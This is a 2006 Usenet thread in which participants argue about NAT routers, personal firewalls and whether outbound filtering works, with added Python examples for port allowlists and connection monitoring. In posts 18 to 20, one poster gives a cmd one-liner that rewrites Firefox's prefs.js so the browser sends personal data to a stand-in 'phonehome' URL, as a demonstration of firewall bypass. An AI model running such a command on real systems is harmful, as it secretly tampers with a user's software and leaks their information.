outbound filtering - Firewalls



Thread: outbound filtering

  1. outbound filtering

    I have a NAT router with SPI filtering. I guess I'm relatively safe
    from inbound baddies but not from outbound programs. Of course I am
    sure that's not completely true but for the most part I believe that is
    correct.

    Is there an application other than a bloated PFW that can be used to
    monitor outbound connections and grant access or not?

  2. Re: outbound filtering

    In article ,
    REMOVETHISbadgolferman@gmail.com says...
    > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > from inbound baddies but not from outbound programs. Of course I am
    > sure that's not completely true but for the most part I believe that is
    > correct.
    >
    > Is there an application other than a bloated PFW that can be used to
    > monitor outbound connections and grant access or not?
    >

    System Safety Monitor can do this, or if you want a little more control
    and something that's free, then Kerio 2.15 PFW, which isn't at all bloated,
    or older versions of ZoneAlarm would suffice. Now put on your flak jacket,
    and get ready for the zealots' perspective.
    me

  3. Re: outbound filtering

    badgolferman wrote:

    > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > from inbound baddies but not from outbound programs. Of course I am
    > sure that's not completely true but for the most part I believe that is
    > correct.


    Security is not about belief. And your belief is pretty wrong in that
    case. Don't you know what NAT helpers are?

    > Is there an application other than a bloated PFW that can be used to
    > monitor outbound connections and grant access or not?


    Monitoring: trivially 'netstat' and all its variants. Why are you asking?
    Want to implement a firewall, but don't even know the most basic tools of
    your OS?

    Granting access: Doesn't work for a PFW either. Why do you think such a
    thing could work?

  4. Re: outbound filtering

    Sebastian Gottschalk, 12/26/2006, 2:02:51 PM,
    <4vda0cF1bp9cjU1@mid.dfncis.de> wrote:

    > badgolferman wrote:
    >
    > > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > > from inbound baddies but not from outbound programs. Of course I am
    > > sure that's not completely true but for the most part I believe
    > > that is correct.

    >
    > Security is not about belief. And your belief is pretty wrong in
    > that case. Don't you know what NAT helpers are?
    >
    > > Is there an application other than a bloated PFW that can be used to
    > > monitor outbound connections and grant access or not?

    >
    > Monitoring: trivially 'netstat' and all its variants. Why are you
    > asking? Want to implement a firewall, but don't even know the most
    > basic tools of your OS?
    >
    > Granting access: Doesn't work for a PFW either. Why do you think such
    > a thing could work?



    If your intent is to make me look stupid and yourself ingenious then I
    guess you are accomplishing that. Please go ahead and explain rather
    than ask questions of someone who is no expert.

  5. Re: outbound filtering

    badgolferman wrote:

    > Please go ahead and explain


    Please go ahead and STFW.

    > rather than ask questions of someone who is no expert.


    Well, if you're no expert, then how exactly do you think you could achieve
    any security by implementing a packet filter? Without sufficient knowledge,
    you'll achieve nothing at best, but more likely just shoot yourself in the
    foot.

  6. Re: outbound filtering

    badgolferman wrote:

    > If your intent is to make me look stupid and yourself ingenious then I
    > guess you are accomplishing that. Please go ahead and explain rather
    > than ask questions of someone who is no expert.


    I'm afraid it's the sort of unhelpful and sneering reply we've become
    used to on this forum. He obviously knows a lot about security, but
    would rather crow about it than offer help.

    Jim Ford

  7. Re: outbound filtering

    Jim Ford, 12/26/2006,3:32:22 PM, wrote:

    > He obviously knows a lot about security


    Maybe not. If he really knew a lot about security he would be willing
    to offer advice. I'd say he knows a lot about arrogance.

  8. Re: outbound filtering

    badgolferman wrote:
    > Jim Ford, 12/26/2006,3:32:22 PM, wrote:
    >
    >> He obviously knows a lot about security

    >
    > Maybe not. If he really knew a lot about security he would be willing
    > to offer advice.


    Maybe. I can't recall a posting by him that wasn't in the same vein as
    the reply you got - all snide and sneering remarks with little
    informative content. I guess most other users have kill-filed/filtered
    him out by now.

    Jim Ford



  9. Re: outbound filtering

    In article ,
    REMOVETHISbadgolferman@gmail.com says...
    > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > from inbound baddies but not from outbound programs. Of course I am
    > sure that's not completely true but for the most part I believe that is
    > correct.
    >
    > Is there an application other than a bloated PFW that can be used to
    > monitor outbound connections and grant access or not?


    With a NAT router, not really. With a firewall, your first rule of
    access is to block everything and only permit access to what is
    required.

    With that in mind, many people secure the internet from their systems by
    blocking ports 135-139, 445, 1433, 1434 outbound - so that a compromised
    Windows machine and other things can't use those ports to attack others
    on the net. Many of us also block outbound HTTP access so that only
    approved sites can be accessed - so that a trojan or other malware that
    phones home on port 80 won't be able to reach the mother to get a new
    download/instructions. The same is true with HTTPS, only allow access to
    approved sites. Email, that's another, we don't allow POP/SMTP outbound
    from the LAN, except the specific address of the email server, so people
    can't sit at their desks and fetch email from outside the company, and
    if they get a SMTP malware, it can't send blindly (unless it tries to
    relay through the mail server).....

    There is no reliable means to have the appliance block an application on
    your computer, but you can block what the computer accesses.

    --

    spam999free@rrohio.com
    remove 999 in order to email me

  10. Re: outbound filtering

    Jim Ford wrote:

    > badgolferman wrote:
    >
    >> If your intent is to make me look stupid and yourself ingenious then I
    >> guess you are accomplishing that. Please go ahead and explain rather
    >> than ask questions of someone who is no expert.

    >
    > I'm afraid it's the sort of unhelpful and sneering reply we've become
    > used to on this forum.


    This is no forum, this is Usenet. And Usenet is not a support medium, it's
    a medium for discussion.

  11. Re: outbound filtering

    badgolferman wrote:

    > Jim Ford, 12/26/2006,3:32:22 PM, wrote:
    >
    >> He obviously knows a lot about security

    >
    > Maybe not. If he really knew a lot about security he would be willing
    > to offer advice. I'd say he knows a lot about arrogance.


    Actually this one rather belongs much more to a meta discussion. Your
    problem is not a concrete security problem, but the lack of concept and
    knowledge. Offering concrete advice won't solve this more fundamental
    problem.

    And I've pointed out some concrete consequences of this problem:

    - NAT routers aren't firewall or security devices.
    - Monitoring connections doesn't require extensive packet filters with
    state machines, but just standard operating system tools requesting such
    information directly from the OS.
    - Outbound filtering doesn't work. Never did, never will, beside the wishes
    because it would be nice if it actually worked. And the reason is
    inter-process communication, some feature that you wouldn't like to miss
    either.

  12. Re: outbound filtering

    Sebastian Gottschalk, 12/26/2006,5:46:04 PM, wrote:

    > badgolferman wrote:
    >
    > > Jim Ford, 12/26/2006,3:32:22 PM, wrote:
    > >
    > >> He obviously knows a lot about security

    > >
    > > Maybe not. If he really knew a lot about security he would be
    > > willing to offer advice. I'd say he knows a lot about arrogance.

    >
    > Actually this one rather belongs much more to a meta discussion. Your
    > problem is not a concrete security problem, but the lack of concept
    > and knowledge. Offering concrete advice won't solve this more
    > fundamental problem.
    >
    > And I've pointed out some concrete consequences of this problem:
    >
    > - NAT routers aren't firewall or security devices.
    > - Monitoring connections doesn't require extensive packet filters with
    > state machines, but just standard operating system tools requesting
    > such information directly from the OS.
    > - Outbound filtering doesn't work. Never did, never will, beside the
    > wishes because it would be nice if it actually worked. And the reason
    > is inter-process communication, some feature that you wouldn't like
    > to miss either.


    Thank you for the informative response.

  13. Re: outbound filtering

    In article ,
    void@nowhere.lan says...
    > In article ,
    > REMOVETHISbadgolferman@gmail.com says...
    > > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > > from inbound baddies but not from outbound programs. Of course I am
    > > sure that's not completely true but for the most part I believe that is
    > > correct.
    > >
    > > Is there an application other than a bloated PFW that can be used to
    > > monitor outbound connections and grant access or not?

    >
    > With a NAT router, not really. With a firewall, your first rule of
    > access is to block everything and only permit access to what is
    > required.
    >
    > With that in mind, many people secure the internet from their systems by
    > blocking ports 135-139, 445, 1433, 1434 outbound - so that a compromised
    > Windows machine and other things can't use those ports to attack others
    > on the net. Many of us also block outbound HTTP access so that only
    > approved sites can be accessed - so that a trojan or other malware that
    > phones home on port 80 won't be able to reach the mother to get a new
    > download/instructions. The same is true with HTTPS, only allow access to
    > approved sites. Email, that's another, we don't allow POP/SMTP outbound
    > from the LAN, except the specific address of the email server, so people
    > can't sit at their desks and fetch email from outside the company, and
    > if they get a SMTP malware, it can't send blindly (unless it tries to
    > relay through the mail server).....
    >
    > There is no reliable means to have the appliance block an application on
    > your computer, but you can block what the computer accesses.
    >
    >

    Leythos, thank you for this excellent information. I have used many of
    these points in my Sygate setup for the last 4-yrs with good results.
    Here is an example of port blocking that I use.

    Blocked TCP Ports

    Traffic Direction: Outbound
    Remote ports
    1-12,14-24,26-42,44-79,81-109,111-118,120-442,444-8079,8081-11370,11372-65535
    Local ports
    1-1024,1600-65535

    Traffic Direction: Inbound
    Remote ports
    1-65535
    Local ports
    1-1024, 1600-65535

    Casey

  14. Re: outbound filtering

    In article ,
    jaford@watford53.freeserve.co.uk says...
    > badgolferman wrote:
    >
    > > If your intent is to make me look stupid and yourself ingenious then I
    > > guess you are accomplishing that. Please go ahead and explain rather
    > > than ask questions of someone who is no expert.

    >
    > I'm afraid it's the sort of unhelpful and sneering reply we've become
    > used to on this forum. He obviously knows a lot about security, but
    > would rather crow about it than offer help.
    >
    > Jim Ford
    >

    What makes you think he knows a lot about security? Some of his advice
    seems to be more attributable to a halfwit.
    me

  15. Re: outbound filtering

    In article <4vdmr9F19m0utU1@mid.dfncis.de>, seppi@seppig.de says...
    > Jim Ford wrote:
    >
    > > badgolferman wrote:
    > >
    > >> If your intent is to make me look stupid and yourself ingenious then I
    > >> guess you are accomplishing that. Please go ahead and explain rather
    > >> than ask questions of someone who is no expert.

    > >
    > > I'm afraid it's the sort of unhelpful and sneering reply we've become
    > > used to on this forum.

    >
    > This is no forum, this is Usenet. And Usenet is not a support medium, it's
    > a medium for discussion.


    Wrong, discussion and conversation is what it was designed for, and
    support is a form of discussion. The groups that were started in the
    early 84's were about sharing ideas and needs/methods and support for
    those items/methods.

    Get off your high-horse and start helping instead of acting like a
    snotty nosed kid.

    --

    spam999free@rrohio.com
    remove 999 in order to email me

  16. Re: outbound filtering

    In article ,
    casey@notspecified.net says...
    > In article ,
    > void@nowhere.lan says...
    > > In article ,
    > > REMOVETHISbadgolferman@gmail.com says...
    > > > I have a NAT router with SPI filtering. I guess I'm relatively safe
    > > > from inbound baddies but not from outbound programs. Of course I am
    > > > sure that's not completely true but for the most part I believe that is
    > > > correct.
    > > >
    > > > Is there an application other than a bloated PFW that can be used to
    > > > monitor outbound connections and grant access or not?

    > >
    > > With a NAT router, not really. With a firewall, your first rule of
    > > access is to block everything and only permit access to what is
    > > required.
    > >
    > > With that in mind, many people secure the internet from their systems by
    > > blocking ports 135-139, 445, 1433, 1434 outbound - so that a compromised
    > > Windows machine and other things can't use those ports to attack others
    > > on the net. Many of us also block outbound HTTP access so that only
    > > approved sites can be accessed - so that a trojan or other malware that
    > > phones home on port 80 won't be able to reach the mother to get a new
    > > download/instructions. The same is true with HTTPS, only allow access to
    > > approved sites. Email, that's another, we don't allow POP/SMTP outbound
    > > from the LAN, except the specific address of the email server, so people
    > > can't sit at their desks and fetch email from outside the company, and
    > > if they get a SMTP malware, it can't send blindly (unless it tries to
    > > relay through the mail server).....
    > >
    > > There is no reliable means to have the appliance block an application on
    > > your computer, but you can block what the computer accesses.
    > >
    > >

    > Leythos, thank you for this excellent information. I have used many of
    > these points in my Sygate setup for the last 4-yrs with good results.
    > Here is an example of port blocking that I use.
    >
    > Blocked TCP Ports
    >
    > Traffic Direction: Outbound
    > Remote ports
    > 1-12,14-24,26-42,44-79,81-109,111-118,120-442,444-8079,8081-11370,11372-65535
    > Local ports
    > 1-1024,1600-65535
    >
    > Traffic Direction: Inbound
    > Remote ports
    > 1-65535
    > Local ports
    > 1-1024, 1600-65535


    That's a good set, but, in a typical firewall, everything is blocked by
    default, only permitted by adding a rule, so it can save a lot of work.

    --

    spam999free@rrohio.com
    remove 999 in order to email me
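
Added example (not part of any poster's message): the blocked-range lists from post 13 inverted into the allowlist that a default-deny firewall, as described in post 16, would state directly, plus a check that the set also covers the ports post 9 blocks outbound. Function names are hypothetical; the service labels are the IANA-registered names for those ports.

```python
# Added example: invert a blocked-port list into the equivalent allowlist.

MAX_PORT = 65535

# Blocked TCP lists copied from post 13 (Sygate configuration).
OUTBOUND_REMOTE_BLOCKED = ("1-12,14-24,26-42,44-79,81-109,111-118,120-442,"
                           "444-8079,8081-11370,11372-65535")
OUTBOUND_LOCAL_BLOCKED = "1-1024,1600-65535"
INBOUND_REMOTE_BLOCKED = "1-65535"

# Ports post 9 blocks outbound so a compromised host cannot attack others.
POST9_BLOCKED = "135-139,445,1433,1434"

# IANA service names for the ports the outbound list leaves open.
SERVICES = {13: "daytime", 25: "smtp", 43: "whois", 80: "http", 110: "pop3",
            119: "nntp", 443: "https", 8080: "http-alt", 11371: "hkp"}


def parse_ranges(spec):
    """Parse '1-12, 14-24,80' into a sorted list of (low, high) tuples."""
    ranges = []
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        low, _, high = part.partition("-")
        low = int(low)
        high = int(high) if high else low
        if not 1 <= low <= high <= MAX_PORT:
            raise ValueError(f"bad port range: {part!r}")
        ranges.append((low, high))
    return sorted(ranges)


def complement(ranges):
    """Return the ranges in 1..65535 that the given sorted ranges do not cover."""
    allowed = []
    next_free = 1
    for low, high in ranges:
        if low > next_free:
            allowed.append((next_free, low - 1))
        next_free = max(next_free, high + 1)  # tolerate overlapping input
    if next_free <= MAX_PORT:
        allowed.append((next_free, MAX_PORT))
    return allowed


def format_ranges(ranges):
    return ",".join(str(lo) if lo == hi else f"{lo}-{hi}" for lo, hi in ranges)


def allowlist(blocked_spec):
    """The 'permit' rule set equivalent to a 'block these ranges' rule set."""
    return format_ranges(complement(parse_ranges(blocked_spec)))


def covers(blocked_spec, wanted_spec):
    """True if every port in wanted_spec is blocked by blocked_spec."""
    allowed = complement(parse_ranges(blocked_spec))
    return not any(a_lo <= w_hi and w_lo <= a_hi
                   for a_lo, a_hi in allowed
                   for w_lo, w_hi in parse_ranges(wanted_spec))


def describe(blocked_spec):
    """Allowed single ports with service names, e.g. ['80/http', ...]."""
    return [f"{lo}/{SERVICES.get(lo, '?')}"
            for lo, hi in complement(parse_ranges(blocked_spec)) if lo == hi]


if __name__ == "__main__":
    print("outbound, remote ports permitted:", allowlist(OUTBOUND_REMOTE_BLOCKED))
    print("  as services:", ", ".join(describe(OUTBOUND_REMOTE_BLOCKED)))
    print("outbound, local ports permitted: ", allowlist(OUTBOUND_LOCAL_BLOCKED))
    print("inbound, remote ports permitted: ",
          allowlist(INBOUND_REMOTE_BLOCKED) or "(none)")
    print("covers post 9's blocked ports:   ",
          covers(OUTBOUND_REMOTE_BLOCKED, POST9_BLOCKED))
```

Written as an allowlist, the ten blocked ranges reduce to nine permitted remote ports. It also shows that port 25 is open to any remote host in this set, whereas post 9 permits SMTP only to the mail server's address.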

  17. Re: outbound filtering

    On 12/26/2006 2:46 PM, something possessed Sebastian Gottschalk to write:
    > badgolferman wrote:
    >
    >> Jim Ford, 12/26/2006,3:32:22 PM, wrote:
    >>
    >>> He obviously knows a lot about security

    >> Maybe not. If he really knew a lot about security he would be willing
    >> to offer advice. I'd say he knows a lot about arrogance.

    >
    > Actually this one rather belongs much more to a meta discussion. Your
    > problem is not a concrete security problem, but the lack of concept and
    > knowledge. Offering concrete advice won't solve this more fundamental
    > problem.


    What problem? He didn't give an abstract or concrete problem, the OP
    just asked for some advice, and instead received the rantings of a mere
    child who thinks he knows more than the rest of the Internet users and
    uses that arrogant belief to pompously attack any others showing any
    sign of ignorance (by asking for advice) in order to boost and inflate
    your undeveloped ego.
    >
    > And I've pointed out some concrete consequences of this problem:
    >
    > - NAT routers aren't firewall or security devices.

    Depends on the router, but most NAT routers act as hardware firewalls,
    blocking unsolicited inbound connections.
    > - Monitoring connections doesn't require extensive packet filters with
    > state machines, but just standard operating system tools requesting such
    > information directly from the OS.

    Well, that will tell you where your remote endpoint connections are and
    what programs are making the connection, but not much more than that.
    On that note, these are snapshots, not real-time displays of connection
    activity. For a real time display of remote connections I'd recommend
    Kerio Personal Firewall, or if the OP doesn't want a firewall, then
    sysinternals.com TCPMon.
    > - Outbound filtering doesn't work.

    It doesn't?
    > Never did, never will, beside the wishes
    > because it would be nice if it actually worked.

    Well, granted it's not perfect, but neither are AVs. However, I have
    found program baddies that AVs and other anti-malware proggies missed
    solely from being alerted of their outbound connections (which I believe
    is the added security that the OP wishes), so yes, they do work. They
    may be allowed to be circumnavigated, but in the world with Windows and
    Gates nothing is perfect.
    > And the reason is
    > inter-process communication, some feature that you wouldn't like to miss
    > either.

    Elaborate on this please. Are you referring to rootkits, bad modules
    hooking into legit processes, or just processes communicating with
    each other via localhost port communications.

  18. Re: outbound filtering

    William wrote:

    > What problem? He didn't give an abstract or concrete problem, the OP
    > just asked for some advice,


    No, he didn't ask for advice. He babbled arbitrary nonsense, giving a good
    indication that he doesn't know what he wants or what he's talking about.

    >> - NAT routers aren't firewall or security devices.

    > Depends on the router, but most NAT routers act as hardware firewalls,
    > blocking unsolicited inbound connections.


    Well, just by coincidence (since NAT works that way). However, this is not
    reliable and easily circumvented. Thus, it doesn't provide security.

    >> - Monitoring connections doesn't require extensive packet filters with
    >> state machines, but just standard operating system tools requesting such
    >> information directly from the OS.

    > Well, that will tell you where your remote endpoint connections are and
    > what programs are making the connection, but not much more than that.


    What else do you want?

    > On that note, these are snapshots, not real-time displays of connection
    > activity.


    Wrong again. There are numerous implementations that provide a complete
    cover over time.

    > For a real time display of remote connections I'd recommend
    > Kerio Personal Firewall,


    So, you're recommending that he should make his computer intentionally
    vulnerable and unstable? That's really not nice.

    >> - Outbound filtering doesn't work.

    > It doesn't?


    Welcome to reality. You've been sleeping for... how long?

    >> Never did, never will, beside the wishes
    >> because it would be nice if it actually worked.

    > Well, granted it's not perfect, but neither are AVs.


    Oh, you finally understand the difference between protection and intrusion
    detecting?

    > They may be allowed to be circumnavigated, but in the world with Windows and
    > Gates nothing is perfect.


    That's a lame excuse for not defending against running the malware in the first
    place. Which is a serious security concept that provides protection. And
    doesn't make the system more vulnerable.

    >> And the reason is
    >> inter-process communication, some feature that you wouldn't like to miss
    >> either.

    > Elaborate on this please. Are you referring to rootkits, bad modules
    > hooking into legit processes, or just processes communicating with
    > each other via localhost port communications.


    for /r %i in (prefs.js) do echo
    user_pref("browser.homepage.override","http://phonehome.org/easily_bypassed.pl?somepersonalinformation");>>"%i"

    And the next time you start up Firefox, it will phone home on behalf of the
    illegitimate application. Now, would you finally get a clue that you don't
    even need direct IPC at all to remote control other applications?

  19. Re: outbound filtering

    On 12/27/2006 2:49 AM, something possessed Sebastian Gottschalk to write:
    > William wrote:
    >
    >> What problem? He didn't give an abstract or concrete problem, the OP
    >> just asked for some advice,

    >
    > No, he didn't ask for advice. He babbled arbitrary nonsense, giving a good
    > indication that he doesn't know what he wants or what he's talking about.
    >

    People asking for advice often don't know exactly what's out there to
    fulfill their needs, otherwise they'd get that and not ask for advice.
    >>> - NAT routers aren't firewall or security devices.

    >> Depends on the router, but most NAT routers act as hardware firewalls,
    >> blocking unsolicited inbound connections.

    >
    > Well, just by coincidence (since NAT works that way). However, this is not
    > reliable and easily circumvented. Thus, it doesn't provide security.

    Nonetheless, it IS a hardware firewall, and since you felt inclined to
    mention that it wasn't, someone needed to provide correct information
    before whoever reads this thread becomes as confused about firewalls and
    Internet Security in general as you.
    >
    >>> - Monitoring connections doesn't require extensive packet filters with
    >>> state machines, but just standard operating system tools requesting such
    >>> information directly from the OS.

    >> Well, that will tell you where your remote endpoint connections are and
    >> what programs are making the connection, but not much more than that.

    >
    > What else do you want?

    Maybe Packet Sniffing, or Monitoring not just when a connection is made,
    but when an application changes (Kerio Personal Firewall provides this
    PROTECTION, if a process is changed, the user is alerted to it).
    >
    >> On that note, these are snapshots, not real-time displays of connection
    >> activity.

    >
    > Wrong again. There are numerous implementations that provide a complete
    > cover over time.
    >

    Like?
    >> For a real time display of remote connections I'd recommend
    >> Kerio Personal Firewall,

    >
    > So, you're recommending that he should make his computer intentionally
    > vulnerable and unstable? That's really not nice.

    No, I'm recommending he not listen to you and install either TCPMon or
    if he wants something more secure to monitor outbound connections Kerio
    Personal Firewall. I've never had it destabilise my PC, and it's much
    more secure than running without (but hey, at least he's got a hardware
    FIREWALL (router)).
    >
    >>> - Outbound filtering doesn't work.

    >> It doesn't?

    >
    > Welcome to reality. You've been sleeping for... how long?

    I try to get 8 hours of sleep every day, but in most circumstances it
    DOES work.
    >
    >>> Never did, never will, beside the wishes
    >>> because it would be nice if it actually worked.

    >> Well, granted it's not perfect, but neither are AVs.

    >
    > Oh, you finally understand the difference between protection and intrusion
    > detecting?

    They're related, just like a burglar alarm is related to security, a
    firewall is an essential asset to Internet Security (though it shouldn't
    be the only measure)
    >
    >> They may be allowed to be circumnavigated, but in the world with Windows and
    >> Gates nothing is perfect.

    >
    > That's a lame excuse for not defending against running the malware in the first
    > place. Which is a serious security concept that provides protection. And
    > doesn't make the system more vulnerable.

    The only way this user's system would become more vulnerable is if he
    were to take your advice. While FWs aren't perfect, they are essential
    to any Internet security implementation. Of course, no one is saying
    that that should be the only user's course of action. I'm sure the OP
    has already taken some other necessary steps toward securing his/her PC
    long before posting here (i.e. using a NAT router, implementing at least
    one AV product (but only one real-time scanner), and practicing safe-hex
    practices regarding web-site and attackments).
    >
    >>> And the reason is
    >>> inter-process communication, some feature that you wouldn't like to miss
    >>> either.

    >> Elaborate on this please. Are you referring to rootkits, bad modules
    >> hooking into legit processes, or just processes communicating with
    >> each other via localhost port communications.

    >
    > for /r %i in (prefs.js) do echo
    > user_pref("browser.homepage.override","http://phonehome.org/easily_bypassed.pl?somepersonalinformation");>>"%i"

    Um...This link doesn't work the way you're intending it to. For one, it
    DOESN'T access prefs.js. I thought that maybe it was because of a
    wordwrap, so I created a simple test.html file with
    testyour broken link thingie.
    I think what you were intending to demonstrate is that some processes may
    try to make changes to other programs' user-prefs (AFAIK, Kerio protects
    against this, but I haven't had the opportunity to test this out. I do
    know that when one process tries to access another (which is
    interprocess communication, not what you were trying to demonstrate just
    now), that Kerio does protect against that by alerting the user and
    asking if he/she wants to allow or deny. Also, if I were to click this
    link in Firefox, Kerio would alert that Firefox was trying to access
    the trusted zone (unless a rule is already set up), in which case,
    knowing that Internet Browsers should communicate with the Internet, and
    what business does it have accessing any files on your computer, then
    I'd simply block it).
    >
    > And the next time you start up Firefox, it will phone home on behalf of the
    > illegitimate application.

    No, it won't, because it didn't work.
    > Now, would you finally get a clue that you don't
    > even need direct IPC at all to remote control other applications?

    Well, will you get a clue that that was never the argument. The
    argument was that you were being a mere child attacking others at any
    sign of ignorance, rather than trying to assist others, in order to
    boost your inflated undeveloped ego. Now that you had to try to defend
    your position, the usenet community that hasn't killfiled you yet can
    now see that you haven't a clue what you're talking about. Hopefully,
    this will persuade you to lurk for a little bit and listen to the real
    experts, rather than spout garbage that may be harmful to the end-user
    should they listen to your rantings. In Summary: NAT Router=Hardware
    Firewall. Firewall=good (It depends on the FW, but I recommend Kerio,
    in addition to NAT Router). No Firewall=Bad.

  20. Re: outbound filtering

    William wrote:

    > People asking for advice often don't know exactly what's out there to
    > fulfill their needs, otherwise they'd get that and not ask for advice.


    People usually tend to ask for stuff about their wrong conclusion, not
    about the actual issues. After all, why is he twisting NAT and packet
    filtering if he's generally concerned about the trustworthiness of the
    installed software packages? That's already a big jump, in the wrong
    direction.

    > Nonetheless, it IS a hardware firewall,


    It isn't a "hardware" firewall, it's a NAT router. It might have a packet
    filter implemented, but without proper configuration it won't do anything.
    And for most implementations, one could say that a proper configuration is
    impossible.

    > and since you felt inclined to
    > mention that it wasn't, someone needed to provide correct information
    > before whoever reads this thread becomes as confused about firewalls and
    > Internet Security in general as you.


    Well, then please provide correct information. NAT and packet filtering are
    different things.

    >>> Well, that will tell you where your remote endpoint connections are and
    >>> what programs are making the connection, but not much more than that.

    >>
    >> What else do you want?

    > Maybe Packet Sniffing,


    Well, then one should use a packet sniffer.

    > or Monitoring not just when a connection is made, but when an application
    > changes


    D'oh. That's a simple shell script combining 'netstat', 'tail' and
    'sha1sum'. Anyway, why should an application change without expectation?

    > (Kerio Personal Firewall provides this PROTECTION, if a process is changed,
    > the user is alerted to it).


    Why do you insist on calling it "protection" beside it not being such?

    >> Wrong again. There are numerous implementations that provide a complete
    >> cover over time.
    >>

    > Like?


    Port Reporter. Freely available from Microsoft. Sits in the background and
    logs everything, just like it should be.

    >> So, you're recommending that he should make his computer intentionally
    >> vulnerable and unstable? That's really not nice.

    > No, I'm recommending he not listen to you and install either TCPMon or
    > if he wants something more secure to monitor outbound connections Kerio
    > Personal Firewall.


    Then you are making such a recommendation. Kerio PFW will make his
    computer trivially vulnerable, if you like it or not.

    > I've never had it destabilise my PC, and it's much more secure than running
    > without


    Even more bull****. You're implying that it would actually increase
    security. How should it do so? Magic fairies?

    > I try to get 8 hours of sleep every day, but in most circumstances it
    > DOES work.


    Huh? It does work if the application plays nice. In that case, it isn't
    needed in the first place. So you like toying around?

    >> Oh, you finally understand the difference between protection and intrusion
    >> detecting?

    > They're related, just like a burglar alarm is related to security, a
    > firewall is an essential asset to Internet Security (though it shouldn't
    > be the only measure)


    Oh, what a bull****. Since when is a firewall essential for a home
    computer's security? And where is the firewall anyway?

    > While FWs aren't perfect, they are essential to any Internet security
    > implementation.


    Cut it out. My system proves that you're talking nonsense about such
    nonsense being essential.

    > (i.e. using a NAT router,


    Again: A NAT router doesn't provide any security at all.

    > implementing at least one AV product (but only one real-time scanner),


    That's not a protection either.

    > and practicing safe-hex practices regarding web-site and attackments.


    Eh... what exactly should websites be security risks? Or attachments?

    And why am I missing even the most really essential stuff like installing
    updates and minimizing privileges? You really don't have any clue.

    >> for /r %i in (prefs.js) do echo
    >> user_pref("browser.homepage.override","http://phonehome.org/easily_bypassed.pl?somepersonalinformation");>>"%i"

    > Um...This link doesn't work the way you're intending it to.


    This is no link. It's a cmd-shell command line.

    > For one, it DOESN'T access prefs.js. I thought that maybe it was because of a
    > wordwrap, so I created a simple test.html file with
    > test your broken link thingie.


    Huh?

    > I think what you were intending to demonstrate is that some processes may
    > try to make changes to other programs' user-prefs (AFAIK, Kerio protects
    > against this,


    It doesn't. And I don't even know why it should. Or how it should keep an
    eye on everything. Seems like you really don't understand the problem at
    all.

    > I do know that when one process tries to access another (which is
    > interprocess communication, not what you were trying to demonstrate just
    > now), that Kerio does protect against that by alerting the user and
    > asking if he/she wants to allow or deny.


    Wrong again. Just use Windows Messages, OLE, DDE or other stuff. This has
    even been proven to bypass everything.

    And, as demonstrated, you don't even need IPC at all - passive modification
    of the configuration data is already sufficient.

    > Also, if I were to click this link in Firefox,


    Once again, you're talking nonsense. There is no link to click. You open up
    Firefox, and it will surf to the changed start page while also transmitting
    information, just like it did before.

    > Kerio would alert that Firefox was trying to access the trusted zone


    WTF is a trusted zone in Firefox?

    > In Summary: NAT Router=Hardware
    > Firewall. Firewall=good (It depends on the FW, but I recommend Kerio,
    > in addition to NAT Router). No Firewall=Bad.


    Ah, I understand: William = idiot

    Now please, go away. You don't have any technical knowledge at all, and
    unless you're willing to learn, you'll just keep on spouting nonsense. I
    won't mind you, but please stop telling such nonsense to other people who
    don't know any better.
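
Added example, not from any poster in the thread: post 20 describes monitoring "not just when a connection is made, but when an application changes" as a script combining 'netstat', 'tail' and 'sha1sum'; this is that idea in Python, run over constructed output in the column layout of Windows `netstat -ano`. The PID-to-executable map (which on a real system would come from a process listing), the function names and the sample addresses are assumptions.

```python
# Added example: log new outbound connections and flag changed executables.
import hashlib
import os
import tempfile

# Constructed sample in the column layout of Windows `netstat -ano`.
SAMPLE_SNAPSHOT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    192.168.1.10:49712     203.0.113.7:80         ESTABLISHED     4321
  TCP    192.168.1.10:49730     198.51.100.25:25       ESTABLISHED     5120
  UDP    0.0.0.0:500            *:*                                    4
"""


def parse_netstat(text):
    """Return (pid, remote_host, remote_port) for each established TCP row."""
    conns = []
    for line in text.splitlines():
        fields = line.split()
        # TCP rows have five columns; UDP rows have no State column.
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "ESTABLISHED":
            continue
        host, _, port = fields[2].rpartition(":")
        conns.append((int(fields[4]), host, int(port)))
    return conns


def sha1_of(path):
    """Hash a file in chunks (the 'sha1sum' part of the script)."""
    digest = hashlib.sha1()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def review(snapshot, pid_to_exe, seen, baseline):
    """Compare one snapshot against earlier ones (the 'tail' part).

    seen:     set of (exe, host, port) already reported; updated in place.
    baseline: dict exe -> SHA-1 recorded the first time it connected.
    Returns (exe, host, port, status) for connections that are new or whose
    executable no longer matches its baseline hash.
    """
    events = []
    for pid, host, port in parse_netstat(snapshot):
        exe = pid_to_exe.get(pid)
        if exe is None:
            status = "unmapped-pid"
        else:
            try:
                digest = sha1_of(exe)
            except OSError:
                digest = None
            if digest is None:
                status = "unreadable"
            elif exe not in baseline:
                baseline[exe] = digest
                status = "first-seen"
            elif baseline[exe] != digest:
                status = "changed"
            else:
                status = "known"
        key = (exe, host, port)
        if key not in seen or status == "changed":
            seen.add(key)
            events.append((exe or f"pid {pid}", host, port, status))
    return events


if __name__ == "__main__":
    workdir = tempfile.mkdtemp()
    browser = os.path.join(workdir, "browser.exe")   # stand-in files,
    mailer = os.path.join(workdir, "mailer.exe")     # not real programs
    for path in (browser, mailer):
        with open(path, "wb") as handle:
            handle.write(b"original build")
    pids = {4321: browser, 5120: mailer}
    seen, baseline = set(), {}
    print("poll 1:", review(SAMPLE_SNAPSHOT, pids, seen, baseline))
    print("poll 2:", review(SAMPLE_SNAPSHOT, pids, seen, baseline))
    with open(browser, "wb") as handle:
        handle.write(b"replaced on disk")
    print("poll 3:", review(SAMPLE_SNAPSHOT, pids, seen, baseline))
```

This is logging and detection only, matching the distinction drawn in the thread: it records which program talked to which endpoint and whether the file changed, and it cannot attribute traffic that one program sends through another.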
